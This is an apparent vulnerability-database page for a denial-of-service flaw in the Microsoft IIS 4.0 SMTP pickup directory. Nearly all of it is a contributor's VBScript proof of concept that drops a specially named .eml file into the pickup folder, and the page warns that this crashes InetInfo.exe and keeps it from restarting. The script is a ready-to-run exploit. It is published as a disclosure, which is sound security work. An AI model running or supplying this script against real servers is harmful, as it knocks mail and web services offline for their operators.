• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Microsoft IIS 4.0 Pickup Directory DoS Vulnerability

Valentijn <iam@MY.NET> has provided the following sample script:

<example script>

' PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"

Set fso = createobject("scripting.filesystemobject")
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName)
Thefile.writeline "X-Sender: CRASHTHIS@my.net"
Thefile.writeline "X-Receiver: dump@my.net"
Thefile.writeline "From: <CRASHTHIS@my.net>"
Thefile.writeline "To: <dump@my.net>"
Thefile.writeline "Subject: MINE DID NOT CRASH"
Thefile.writeline "Date: " & now()
Thefile.writeline "X-Generator: " & Thename
Thefile.close
Set thefile = nothing
Thename = ""

Function Createkey
for z = 1 to 80
randomize
a = Int((25 * Rnd) + 1)
password = password & chr(a+65)
next
Createkey = password
end function
' Warning IF InetInfo.exe crashes it cannot be started again as long as the
file is still there!

</example script>